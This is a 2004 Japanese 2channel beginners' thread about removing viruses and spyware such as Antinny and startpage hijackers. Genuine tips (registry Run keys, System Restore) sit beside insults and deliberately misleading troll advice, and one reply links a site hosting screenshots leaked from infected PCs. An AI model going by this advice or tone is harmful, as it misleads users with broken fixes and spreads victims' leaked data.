そのファイルを消そうとしますが、そのファイルは存在しないようです。
(すべてのファイルを表示にしています)
公式サイトも見ましたが、うまくいきません。
どうやったら除去できますか?
http://up.nm78.com/data/up047078.gif
こんなのが出ます。
・トレンドマイクロ/オンラインスキャン
ではウイルスは発見されませんでした。
・ad-aware も入れてやりましたが、ダメでした。
・ノートンを完全スキャンしてもウイルスは発見されません
227 :ひよこ名無しさん:04/07/19 18:58 ID:gLBfiG74
System32フォルダだけスキャンしてみればいいじゃん
みんななんでコイツがノートン入れてると思い込んでんの?w
たぶん何にも入れてないアフォの可能性のが大きいと俺は思う。
さらにはWindowsUpdateしてないハゲ
たぶん何にも入れてないアフォの可能性のが大きいと俺は思う。
さらにはWindowsUpdateしてないハゲ
>>226
またそのパターンか
それも、そのファイルをインストールしている大元のファイルがあるんじゃないのか?
レジストリのスタートアップを確認しろ。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
またそのパターンか
それも、そのファイルをインストールしている大元のファイルがあるんじゃないのか?
レジストリのスタートアップを確認しろ。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
>>235
ウイルス対策ソフトで駆除しろ。
ウイルス対策ソフトで駆除しろ。
>>235
踏んだらもうおしまい
踏んだらもうおしまい
>>235
再起動後に何が起きるか楽しみにしておけ
再起動後に何が起きるか楽しみにしておけ
240 :ひよこ名無しさん:04/07/19 19:56 ID:BH6B2/3M
http://default-homepage-network.com/start.cgi?hkcu
このアドレスってなに?
間違って踏んじゃったらしらないアイコンでてきたりネットにつなげなくなったり。
このアドレスってなに?
間違って踏んじゃったらしらないアイコンでてきたりネットにつなげなくなったり。
---------- 糸冬 了 -----------
242 :質問です:04/07/19 20:21 ID:hx3JaZqn
ウイルスに感染してパソコンの画像が悪くなったのが
ウイルスを駆除した後も直りません。
どうしたらいいですか?
ウイルスを駆除した後も直りません。
どうしたらいいですか?
243 :ひよこ名無しさん:04/07/19 21:07 ID:ScoKb/Cu
>>242
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
|
____.____ | .__ 壊れたPCを
| | | | |\_\ 窓から
| | ∧_∧ | | | |.◎.| 投げ捨てろ
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
|
____.____ | .__ 壊れたPCを
| | | | |\_\ 窓から
| | ∧_∧ | | | |.◎.| 投げ捨てろ
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄
244 :ひよこ名無しさん:04/07/19 21:12 ID:BGGjs847
さんざん待った答えがそれかい。
>>245
「ウイルスに感染してパソコンの画像が悪くなったのが
ウイルスを駆除した後も直りません。
どうしたらいいですか? 」
↑
これだけでは答えようがない。
例えばパソコンの画像がこのように悪くなった、とか、
どんなウィルスに感染したのか、とか、具体的に書いてくれ。
「ウイルスに感染してパソコンの画像が悪くなったのが
ウイルスを駆除した後も直りません。
どうしたらいいですか? 」
↑
これだけでは答えようがない。
例えばパソコンの画像がこのように悪くなった、とか、
どんなウィルスに感染したのか、とか、具体的に書いてくれ。
>>245
小1時間ほどのことで「さんざん待った」とかほざく香具師。
小1時間ほどのことで「さんざん待った」とかほざく香具師。
ウイルスの名前は忘れてしまった・・・
画像は、部分部分に荒くなってます。
文字はちゃんと表示される。
パソコン本体に修復機能みたいなのがあるけど
なにをどうやればいいのかも分かりません。
画像は、部分部分に荒くなってます。
文字はちゃんと表示される。
パソコン本体に修復機能みたいなのがあるけど
なにをどうやればいいのかも分かりません。
>>248
これをやってみ。
「スタート」→「プログラム」→「アクセサリ」→「システムツール」→「システムの復元」
それと画像の解像度をもう一回確認してみ。
ディスクトップを右クリック→「画面のプロパティ」→「設定」
これをやってみ。
「スタート」→「プログラム」→「アクセサリ」→「システムツール」→「システムの復元」
それと画像の解像度をもう一回確認してみ。
ディスクトップを右クリック→「画面のプロパティ」→「設定」
「死んだふり」して検知をすり抜ける新種のワームが登場
http://headlines.yahoo.co.jp/hl?a=20040715-00000002-cnet-sci
http://headlines.yahoo.co.jp/hl?a=20040715-00000002-cnet-sci
252 :ひよこ名無しさん:04/07/20 12:19 ID:dl+yKryb
マジでビビっております。神様仏様偉い人教えてください。
普段ローマ字入力なんですが、「A」と入力しても「2」が出てきたり、
「N」と入力しても「f」が出てきたりと、まともに入力できないんです。
一台のパソコンを共有してるのですが、こっちは何ともないのです。
ノートンでチェックしたら「Trojan,ByteVerify」とか言うウイルスが
七つも貼り付いてましたのですぐ検疫したのですが、一向に直りません。
シマンテックのHPに書いてある「Trojan,ByteVerify」に感染した時の
修復方法を試しても、途中で電源が落ちてしまいどうにもなりません。
故障なんですか?やっぱりウイルスの仕業なんでしょうか?
普段ローマ字入力なんですが、「A」と入力しても「2」が出てきたり、
「N」と入力しても「f」が出てきたりと、まともに入力できないんです。
一台のパソコンを共有してるのですが、こっちは何ともないのです。
ノートンでチェックしたら「Trojan,ByteVerify」とか言うウイルスが
七つも貼り付いてましたのですぐ検疫したのですが、一向に直りません。
シマンテックのHPに書いてある「Trojan,ByteVerify」に感染した時の
修復方法を試しても、途中で電源が落ちてしまいどうにもなりません。
故障なんですか?やっぱりウイルスの仕業なんでしょうか?
>>252
ウイルスです
ウイルスです
254 :ひよこ名無しさん:04/07/20 12:31 ID:dl+yKryb
>>254
もちろんそうよ
もちろんそうよ
>>252
キーボードドライバを削除して再起動
キーボードドライバを削除して再起動
257 :ひよこ名無しさん:04/07/20 13:46 ID:dl+yKryb
258 :ひよこ名無しさん:04/07/20 15:31 ID:MSlo8Mm/
システムの復元の仕方教えて下さい。
それ位検索しろよ。脳足りん。
>>259
検索しろとか、他スレいけとか、やかましいねん。
優しくないなぁ。少しぐらい教えろよ、検索してもないから聞いてんねん。
なんで偉そうな奴ばっかりなん?教える立場やからって勘違いするなよ。
ケチばっかりやんけ。なんやねん。ここはPC初心者板やぞ、わざわざ敬語使ってやってんだから初心者には優しくしろ。ハゲ。
検索しろとか、他スレいけとか、やかましいねん。
優しくないなぁ。少しぐらい教えろよ、検索してもないから聞いてんねん。
なんで偉そうな奴ばっかりなん?教える立場やからって勘違いするなよ。
ケチばっかりやんけ。なんやねん。ここはPC初心者板やぞ、わざわざ敬語使ってやってんだから初心者には優しくしろ。ハゲ。
>>260
ばかじゃねえの?
検索すればある。そんな事を一々教えてたら何時まで経っても
自分で思考しない教えてくんだよ。自立的思考失調症なんだよ。お前等。
その上、その程度の事を教えてたら、お前等みたいなヴァカが
何も調べずに質問を繰り返すようになる。
ばかじゃねえの?
検索すればある。そんな事を一々教えてたら何時まで経っても
自分で思考しない教えてくんだよ。自立的思考失調症なんだよ。お前等。
その上、その程度の事を教えてたら、お前等みたいなヴァカが
何も調べずに質問を繰り返すようになる。
263 :ひよこ名無しさん:04/07/20 16:06 ID:xyY7QmHb
>>257
マイクロソフトのこけ脅しに乗るな
マイクロソフトのこけ脅しに乗るな
265 :ひよこ名無しさん:04/07/20 16:46 ID:dl+yKryb
>>265
勇気のないやつは、ステップアップしないんだぞ。
プロパティを見てプロバイダがMicrosoftになっていれば、またインストールされるから大丈夫。
メーカー名になていたら、入れ直さなきゃならん。
勇気のないやつは、ステップアップしないんだぞ。
プロパティを見てプロバイダがMicrosoftになっていれば、またインストールされるから大丈夫。
メーカー名になていたら、入れ直さなきゃならん。
267 :ひよこ名無しさん:04/07/20 17:10 ID:dl+yKryb
>>266
なんで入れ直すすのぉぉぉぉぉぉおぉぉーーーーーーーーーーー!?
なんでそんなロシアンルーレットみたいな事すんのぉぉぉぉおぉぉ!?
…ふんっ。あやうく信じるところだった。いいよいいよ。
答えてねっとで聞いてみるから。
チェッ。スネ夫みたいな奴ばっかりだ!
なんで入れ直すすのぉぉぉぉぉぉおぉぉーーーーーーーーーーー!?
なんでそんなロシアンルーレットみたいな事すんのぉぉぉぉおぉぉ!?
…ふんっ。あやうく信じるところだった。いいよいいよ。
答えてねっとで聞いてみるから。
チェッ。スネ夫みたいな奴ばっかりだ!
>>267
どこで聞いても回答者は同じだ。
どこで聞いても回答者は同じだ。
>>268
(((((((( ;゚Д゚)))))))ガクガクブルブル
(((((((( ;゚Д゚)))))))ガクガクブルブル
どこで聞いてもマルチ氏ねって書き込まれるよ(・∀・)
271 :ひよこ名無しさん:04/07/20 17:50 ID:vFV7xQ8X
>>267
ここで質問しない方がいいよ。ケチと意地悪な奴等ばっかりだから。
あたしなんか嘘教えられて余計にパソコン壊れたからね。
でね、怒ったらね、みんなで「ネタにひっかかるお前が悪い」とか言われたの。
本当にこいつら性格悪いなーって思ったよ。人間不信になりそうだった。
ここで質問しない方がいいよ。ケチと意地悪な奴等ばっかりだから。
あたしなんか嘘教えられて余計にパソコン壊れたからね。
でね、怒ったらね、みんなで「ネタにひっかかるお前が悪い」とか言われたの。
本当にこいつら性格悪いなーって思ったよ。人間不信になりそうだった。
272 :ぼるじょあ ◆yBEncckFOU :04/07/20 17:50 ID:???
(・3・) エェー ボク ちょっとしか ケチじゃないYO
あたしね、母親が病気で父親はあたしが生まれてすぐ他界してね、
自分で生きていくしかなかったの。仕事漬けの毎日で貰った給料も母の入院費に当てて、
で、唯一の楽しみがインターネットだったの。
ウイルスもらったみたいでよくわからなかったから2ちゃんねるで質問してたらね、
めちゃくちゃ教えられたの。結局全部のデータが消えてメル友のアドレスもわからなくなって、
なんであたしだけこんな目に遭わなきゃいけないんだろうって思ったの。
贅沢できなくてもいい、普通の生活がしたい・・・って。
本当に辛かったよ。だから今でも2ちゃんねるの人を恨んで○○○○をばら撒きまくってるの。
自分で生きていくしかなかったの。仕事漬けの毎日で貰った給料も母の入院費に当てて、
で、唯一の楽しみがインターネットだったの。
ウイルスもらったみたいでよくわからなかったから2ちゃんねるで質問してたらね、
めちゃくちゃ教えられたの。結局全部のデータが消えてメル友のアドレスもわからなくなって、
なんであたしだけこんな目に遭わなきゃいけないんだろうって思ったの。
贅沢できなくてもいい、普通の生活がしたい・・・って。
本当に辛かったよ。だから今でも2ちゃんねるの人を恨んで○○○○をばら撒きまくってるの。
>なんであたしだけこんな目に遭わなきゃいけないんだろうって思ったの。
生命が汚いから。
生命が汚いから。
夏の風情
276 :ひよこ名無しさん:04/07/20 19:44 ID:zAqowMvH
↑禿同。
277 :ひよこ名無しさん:04/07/21 05:49 ID:/Kj9kPvu
<base href="res://C:\WINDOWS\SYSTEM\GKPOM.DLL/">
聞いてるこちらもなんかもう意味がわかりません・・・
280 :ひよこ名無しさん:04/07/21 18:10 ID:FEtW4ha6
たぶん>>182と同じ状況だと思います。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A
の手順通り一通り修成せいてみたんですが、フォルダがもとの状態に戻らないです。
どのフォルダ開いても□←これしか表示されないんですけど、他にやらないといけないことってありますか?
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_TOADCOM.A
の手順通り一通り修成せいてみたんですが、フォルダがもとの状態に戻らないです。
どのフォルダ開いても□←これしか表示されないんですけど、他にやらないといけないことってありますか?
282 :ひよこ名無しさん:04/07/21 22:21 ID:lO6ufgvM
オンラインスキャンしたところ
ウィルス名:TROJ_WINTRIM.W
ファイルの場所:c:\windows\system32\ia.dll
というウィルスにかかってしまったんですけど
駆除方法はどうすればよいのでしょう?
http://www.sophos.co.jp/support/disinfection/trojan.html#2
↑から駆除方法探したんですけどウィルス名もHITしない状況では
駆除方法なんてないんでしょうか?
ウィルス名:TROJ_WINTRIM.W
ファイルの場所:c:\windows\system32\ia.dll
というウィルスにかかってしまったんですけど
駆除方法はどうすればよいのでしょう?
http://www.sophos.co.jp/support/disinfection/trojan.html#2
↑から駆除方法探したんですけどウィルス名もHITしない状況では
駆除方法なんてないんでしょうか?
284 :282:04/07/21 22:35 ID:lO6ufgvM
286 :282:04/07/21 22:54 ID:lO6ufgvM
>>285
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=a&virus=WINTRIM&alt=WINTRIM&key=WINTRIM&payload=&type=&day=&month=&year=&wkday=
符号してるものとはどういったものでしょうか?
国語(日本語)の勉強しろよとかいわれそうですが教えてください
http://www.trendmicro.co.jp/vinfo/virusencyclo/default2.asp?m=a&virus=WINTRIM&alt=WINTRIM&key=WINTRIM&payload=&type=&day=&month=&year=&wkday=
符号してるものとはどういったものでしょうか?
国語(日本語)の勉強しろよとかいわれそうですが教えてください
287 :ひよこ名無しさん:04/07/21 23:08 ID:FEtW4ha6
>>281
スマン。
もうどうしようもなくなってきたんで、オンラインスキャンしてみようと思ったんだけど、
「ActiveScanのインストール中にエラーが発生しました。インターネットが正しく接続されて
いるか確認し、[再試行]をクリックしてください。」
って出てきて普通にネットには繋がるんだけどインストールもできないです。
もうダメポ
スマン。
もうどうしようもなくなってきたんで、オンラインスキャンしてみようと思ったんだけど、
「ActiveScanのインストール中にエラーが発生しました。インターネットが正しく接続されて
いるか確認し、[再試行]をクリックしてください。」
って出てきて普通にネットには繋がるんだけどインストールもできないです。
もうダメポ
289 :287:04/07/21 23:53 ID:FEtW4ha6
>>288
d。
一応さっき、ノートンでスキャンしてみたんですけど、
VBS.ラブレターと、Unix.penguinが二個とMacroってのに感染してて削除しました。
というか、初心者なのに何も考えないで踏んだら駄目ですね。。
おとなしく初期化します
d。
一応さっき、ノートンでスキャンしてみたんですけど、
VBS.ラブレターと、Unix.penguinが二個とMacroってのに感染してて削除しました。
というか、初心者なのに何も考えないで踏んだら駄目ですね。。
おとなしく初期化します
>>289
それ誤反応なんだけど・・・
それ誤反応なんだけど・・・
>>289
それで済めばかわいいものだな
それで済めばかわいいものだな
ウィルス駆除できるかな・・・・・・・・・・・
>>293
あんたこそ初期化しろ
あんたこそ初期化しろ
295 :ひよこ名無しさん:04/07/22 00:05 ID:PBn2Glgw
>>295
なかなか良いものをお持ちのようで
なかなか良いものをお持ちのようで
>>293
心配あんがとよ 全部駆除したよ
心配あんがとよ 全部駆除したよ
299 :ひよこ名無しさん:04/07/22 00:31 ID:8fPO2HnO
3年間ウィルス対策を何もしていなくて、不安になったため、
オンラインウィルススキャンができるサイトに行こうとしたら、
「不正な処理が行われたため、強制終了します」
というような表示が出て、IEを終了せざるをえなくなります。
この表示はたまに出るのですが、
ウィルススキャンのサイトに限って必ずその表示が出るのです。
ウィルススキャンができるサイトを10箇所以上回ったのですが、
全滅でした。
そんなにしょっちゅう出る表示じゃないのに。
ウィルススキャンのできるサイトへアクセスするのを
妨害するウイルスなんてあるのでしょうか?
バカな質問だったらごめんなさい。
オンラインウィルススキャンができるサイトに行こうとしたら、
「不正な処理が行われたため、強制終了します」
というような表示が出て、IEを終了せざるをえなくなります。
この表示はたまに出るのですが、
ウィルススキャンのサイトに限って必ずその表示が出るのです。
ウィルススキャンができるサイトを10箇所以上回ったのですが、
全滅でした。
そんなにしょっちゅう出る表示じゃないのに。
ウィルススキャンのできるサイトへアクセスするのを
妨害するウイルスなんてあるのでしょうか?
バカな質問だったらごめんなさい。
>>299
ある
ある
302 :ひよこ名無しさん:04/07/22 00:35 ID:mWrCddgL
LIVE2chをやっていると時々ウイルスを検出し、修復できないという
メッセージが出るのですが、これはほっといてよいのでしょうか?
メッセージが出るのですが、これはほっといてよいのでしょうか?
>>302
ああ、放っておいていいよ。
ああ、放っておいていいよ。
>>302
いい
2ch見るだけで感染するウィルスはない
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/
このスレも見ると誤反応する
いい
2ch見るだけで感染するウィルスはない
ノートンがvbsウィルスのソースに誤反応2
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/
このスレも見ると誤反応する
>>304
ご飯脳しないんだけど大丈夫なの?ノートン2003更新シマクリです
ご飯脳しないんだけど大丈夫なの?ノートン2003更新シマクリです
306 :299:04/07/22 00:45 ID:8fPO2HnO
すみません、具体的にそれは何と言うウイルスで、
どのような被害があるのでしょうか?
Windowsの再インストール・・・
どうすればよいのやら(汗
どのような被害があるのでしょうか?
Windowsの再インストール・・・
どうすればよいのやら(汗
>>306
体調悪いです。私はどんな病気にかかってますか?
体調悪いです。私はどんな病気にかかってますか?
たぶん、なんかの病気だと思います。>>308
311 :299:04/07/22 00:56 ID:8fPO2HnO
何がなんだかわかりませんが、とりあえず明日
ウイルス駆除ソフトを買ってみます。
ありがとうございました。
ウイルス駆除ソフトを買ってみます。
ありがとうございました。
>>295
スパイウェアちゃんとお友達。
ホームページがsecure32.html、secure.html、security-warning.com/secure2.phpに
ttp://higaitaisaku.web.infoseek.co.jp/removereg32.html
>>299
ほとんどのウイルスは感染した後、
自分が駆除されないためになんらかの防衛をする。
具体的にそれは何と言うウイルスと聞かれても、
症状が細かく説明されないと特定まではできない。
HackerDefenderを悪用したスパイウェア − スパイウェア除去アプリケーションが使えない
ttp://higaitaisaku.web.infoseek.co.jp/removehacdef.html
スパイウェアちゃんとお友達。
ホームページがsecure32.html、secure.html、security-warning.com/secure2.phpに
ttp://higaitaisaku.web.infoseek.co.jp/removereg32.html
>>299
ほとんどのウイルスは感染した後、
自分が駆除されないためになんらかの防衛をする。
具体的にそれは何と言うウイルスと聞かれても、
症状が細かく説明されないと特定まではできない。
HackerDefenderを悪用したスパイウェア − スパイウェア除去アプリケーションが使えない
ttp://higaitaisaku.web.infoseek.co.jp/removehacdef.html
ありがとうございます。
ウィルスってそんな賢いのもいるんですね。
パソコンに対して全くの無知なので、
多分Windowsの再インストールなんてできないと思います。
最悪の場合電気屋さん行きですね。はぁ。
でもできるとこまで自分でがんばってみます(`・ω・´)シャキーン
ウィルスってそんな賢いのもいるんですね。
パソコンに対して全くの無知なので、
多分Windowsの再インストールなんてできないと思います。
最悪の場合電気屋さん行きですね。はぁ。
でもできるとこまで自分でがんばってみます(`・ω・´)シャキーン
(`・ω・´)シャキーンとかしてる場合ではない
ウイルススキャンをセーフガード中に行おうとしたのですが、初期化が・・・が
表記されるだけでスキャンできません。スパイウェアは問題なくセーフガード中に
できます。どうすればできますか?
それと、復元もできません。なにかウイルスに感染しているのでしょうか?
わかる方、もしくは対処の仕方のHP知ってる方教えて下さい。
表記されるだけでスキャンできません。スパイウェアは問題なくセーフガード中に
できます。どうすればできますか?
それと、復元もできません。なにかウイルスに感染しているのでしょうか?
わかる方、もしくは対処の仕方のHP知ってる方教えて下さい。
316 :ひよこ名無しさん:04/07/22 02:44 ID:CLcpNxda
ウィルスバスター2004で検索したら下記のウィルスが検出されました。
しかしながら、テレンドマイクロのデータベースにも記載されておらず
どんな悪さをするものなのか不安です。ご存知の方教えて下さい。
JS_STARTPAG.AD
しかしながら、テレンドマイクロのデータベースにも記載されておらず
どんな悪さをするものなのか不安です。ご存知の方教えて下さい。
JS_STARTPAG.AD
>>316
たぶんスタートページ改変
たぶんスタートページ改変
>>316
どこから検出されたのかちゃんと書け。JSはJavaScriptの略だから
Webページを閲覧した時にインターネット一時ファイルに残っている
可能性が高い。スクリプトが実行されていたらレジストリを書き換えられて
>>317の言うようにホームページが変更されるなどの症状が出るだろうな。
要するにスパイウェア。
どこから検出されたのかちゃんと書け。JSはJavaScriptの略だから
Webページを閲覧した時にインターネット一時ファイルに残っている
可能性が高い。スクリプトが実行されていたらレジストリを書き換えられて
>>317の言うようにホームページが変更されるなどの症状が出るだろうな。
要するにスパイウェア。
319 :ひよこ名無しさん:04/07/22 04:33 ID:JT+v/gPL
初期化ってどうやるんですか?
あと初期化したらウイルスはなくなりますか?
あと初期化したらウイルスはなくなりますか?
321 :ひよこ名無しさん:04/07/22 07:28 ID:yCNfmr9O
【ここで質問してる人たちへ】
他 の サ イ ト で 質 問 す る 方 が 親 切 だ し 丁 寧 だ し イ イ で す よ 。
ここの奴等=言葉使い悪い、嘘教える、見下す、の三拍子揃ってますから。
日本最大のQ&Aサイトとかいうところ見つけてそこで質問したらめちゃくちゃ丁寧で親切に教えてくれました。
それに比べてここの奴等は糞です。おそらく、ここで質問する方が早いレスが貰えると思ってここで質問してる人が
大半と思いますが、めちゃくちゃなことばかり言って来る奴が多いので、結局は問題を改善するのに
時間がかなり掛かります。賢い人は2chで質問するのはやめましょう。
誰が誰かわからないし、すぐに暴言吐く嫌な奴ばかりです。
私の心には、ここで受けた「暴言・中傷」というウイルスが感染していて駆除できません。
他 の サ イ ト で 質 問 す る 方 が 親 切 だ し 丁 寧 だ し イ イ で す よ 。
ここの奴等=言葉使い悪い、嘘教える、見下す、の三拍子揃ってますから。
日本最大のQ&Aサイトとかいうところ見つけてそこで質問したらめちゃくちゃ丁寧で親切に教えてくれました。
それに比べてここの奴等は糞です。おそらく、ここで質問する方が早いレスが貰えると思ってここで質問してる人が
大半と思いますが、めちゃくちゃなことばかり言って来る奴が多いので、結局は問題を改善するのに
時間がかなり掛かります。賢い人は2chで質問するのはやめましょう。
誰が誰かわからないし、すぐに暴言吐く嫌な奴ばかりです。
私の心には、ここで受けた「暴言・中傷」というウイルスが感染していて駆除できません。
>>321
マルチコピペ氏んでよし
マルチコピペ氏んでよし
>>322
おまも死でいいよ。
おまも死でいいよ。
良スレage
パソコンを親に買ってもらったのですが使って一週間くらいたったらwinXP起動時の音が荒れるようになってしまいました。大体2週間くらい使ってからおかしくなったのですがこれはウイルスにようるものなのでしょうか?
>>328
うっせえハゲ。
うっせえハゲ。
> winXP起動時の音が荒れるようになってしまいました。
意味が分からない、どういう状態なの?
意味が分からない、どういう状態なの?
>>328
>パソコンを親に買ってもらったのですが
よかったな
メーカーのサイトに行くと、各ドライバとバンドルアプリレーションのアップデートモジュールがあるかもしれないから、
アップデートする。自分で探すように!
>パソコンを親に買ってもらったのですが
よかったな
メーカーのサイトに行くと、各ドライバとバンドルアプリレーションのアップデートモジュールがあるかもしれないから、
アップデートする。自分で探すように!
332 :ひよこ名無しさん:04/07/22 16:12 ID:HyhfRnOz
Windowsを起動すると何もしていないのにいきなり
フォルダを開いた画面があらわれます。
自分なりに調べてみると、C:\の中にUPFolder.txtが勝手に作られていました。
その中には、
[BicBic]
Path=C:\windows\bugfix
Trip=
と書いてあったので、bugfixを見てみると、
私は既定、antinnyの作者だ
アドレス帳お気に入り既定
の二つがありました。何回削除しても起動するたびに現れます。
どうすればこれらを現れなくすることができるのでしょうか?
長々とすいませんが教えていただけないでしょうか?お願いします。
フォルダを開いた画面があらわれます。
自分なりに調べてみると、C:\の中にUPFolder.txtが勝手に作られていました。
その中には、
[BicBic]
Path=C:\windows\bugfix
Trip=
と書いてあったので、bugfixを見てみると、
私は既定、antinnyの作者だ
アドレス帳お気に入り既定
の二つがありました。何回削除しても起動するたびに現れます。
どうすればこれらを現れなくすることができるのでしょうか?
長々とすいませんが教えていただけないでしょうか?お願いします。
>>332
Winny使っているだろ
Winny使っているだろ
>>332
さあ、調べてみよう!
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CLASSES_ROOT\exefile\shell\command
HKEY_CLASSES_ROOT\txtfile\shell\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_Dlls
さあ、調べてみよう!
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CLASSES_ROOT\exefile\shell\command
HKEY_CLASSES_ROOT\txtfile\shell\command
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_Dlls
336 :ひよこ名無しさん:04/07/22 17:31 ID:RDh6D4wx
332です
winny使ってました。もうやめました。すいません。
今から335さんのレジストリ見てみます。
winny使ってました。もうやめました。すいません。
今から335さんのレジストリ見てみます。
337 :ひよこ名無しさん:04/07/22 17:35 ID:RDh6D4wx
レジストリを見ても何を削除したらいいのかが
分かりませんでした。すいませんが教えてもらえないでしょうか?
分かりませんでした。すいませんが教えてもらえないでしょうか?
>>332
こんなのあったよ、あなたのもあるかも(・∀・)
ttp://aa4a.com/goldball/
ウイルス「Antinny」によって流出したデスクトップ画像が置いてあるサイト。
PC無害。倫理的にはどうかと。
こんなのあったよ、あなたのもあるかも(・∀・)
ttp://aa4a.com/goldball/
ウイルス「Antinny」によって流出したデスクトップ画像が置いてあるサイト。
PC無害。倫理的にはどうかと。
341 :ひよこ名無しさん:04/07/22 17:53 ID:RDh6D4wx
みなさんありがとう。
今からやってみます。
後で報告に来ますね。
今からやってみます。
後で報告に来ますね。
>>341
ウイルススキャンしても出ないと思うから、
たぶんズバリと思われる情報のURLを教えておくよ。
もうnyやめなよ。
【警報】Winnyを狙ったワーム・ウイルス情報 Part22
ttp://tmp4.2ch.net/test/read.cgi/download/1089460762/519-520
ウイルススキャンしても出ないと思うから、
たぶんズバリと思われる情報のURLを教えておくよ。
もうnyやめなよ。
【警報】Winnyを狙ったワーム・ウイルス情報 Part22
ttp://tmp4.2ch.net/test/read.cgi/download/1089460762/519-520
343 :ひよこ名無しさん:04/07/22 18:01 ID:EDDYOBN3
PC初心です。
ウイルス感染してしまい、メール受信ができません。
同じメールが何十回も受信されてきます。
ウイルススキャンをしたら、トロイの木馬と書いてあります。
どうしたらよいでしょうか??
朝から今まで奮闘しても、結局何の解決もしてません。
どうか、教えてください。
ウイルス感染してしまい、メール受信ができません。
同じメールが何十回も受信されてきます。
ウイルススキャンをしたら、トロイの木馬と書いてあります。
どうしたらよいでしょうか??
朝から今まで奮闘しても、結局何の解決もしてません。
どうか、教えてください。
>>343
ウィルス名書けよ
ウィルス名書けよ
345 :ひよこ名無しさん:04/07/22 18:11 ID:+a/tewbN
フグリウイルスです。
346 :315:04/07/22 19:07 ID:3tIueRnk
ウイルススキャンをセーフガード中に行おうとしたのですが、初期化が・・・が
表記されるだけでスキャンできません。スパイウェアは問題なくセーフガード中に
できます。どうすればできますか?
それと、復元もできません。なにかウイルスに感染しているのでしょうか?
わかる方、もしくは対処の仕方のHP知ってる方教えて下さい。
誰か・・・_| ̄|○
表記されるだけでスキャンできません。スパイウェアは問題なくセーフガード中に
できます。どうすればできますか?
それと、復元もできません。なにかウイルスに感染しているのでしょうか?
わかる方、もしくは対処の仕方のHP知ってる方教えて下さい。
誰か・・・_| ̄|○
>>346
再インストール
再インストール
>>346
セーフガードって何?
セーフガードって何?
>>348
多分、その昔、LIFEガードと同じ会社が出してた炭酸飲料水だと思う。
多分、その昔、LIFEガードと同じ会社が出してた炭酸飲料水だと思う。
351 :ひよこ名無しさん:04/07/22 19:36 ID:abUwJnXk
>>348
緊急輸入制限措置のことで、輸入を減らすために高率の関税を課したり、
輸入数量を制限したりすることをいいます。
http://www.nikkei4946.com/today/0204/01.html
OSをセーフガードされない国内産のものと交換しろ。
緊急輸入制限措置のことで、輸入を減らすために高率の関税を課したり、
輸入数量を制限したりすることをいいます。
http://www.nikkei4946.com/today/0204/01.html
OSをセーフガードされない国内産のものと交換しろ。
353 :ひよこ名無しさん:04/07/22 20:26 ID:vbN2/EOg
ホームページが
about:blank
になってしまって
ツールでyahooにしてもだめでした
たすけてくださぁーい!!
about:blank
になってしまって
ツールでyahooにしてもだめでした
たすけてくださぁーい!!
355 :315:04/07/22 20:27 ID:3tIueRnk
誤爆した・・・
ここは日本語教育スレですね!
357 :ひよこ名無しさん:04/07/23 12:11 ID:a43c28Ez
>>339
O4 - HKLM\..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe
O4 - HKLM\..\Run: [MemoryIdle] C:\Program Files\Memory Booster\Memory Booster.exe -PowerOn
O4 - HKLM\..\Run: [INETCONDSP] C:\Program Files\Fujitsu\iNetConDsp\iNetConDsp.exe
O4 - HKLM\..\Run: [BATTERYAID] C:\Program Files\Fujitsu\BATTERYAID\BATTERYAID.exe
O4 - HKLM\..\Run: [YAMAHA AC-XG Power Utility] yacpower.exe
O4 - HKLM\..\Run: [IndicatorUtility] C:\Program Files\Fujitsu\IndicatorUtility\IndicatorUty.exe
O4 - HKLM\..\Run: [WinHandAutoClean] "C:\Program Files\WinHand\AUTOCLN.EXE"
O4 - HKLM\..\Run: [System] C:\WINDOWS\Exploder.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [HDD-Nonクラッシュ] C:\Downloads\hddno132\hddnon.exe
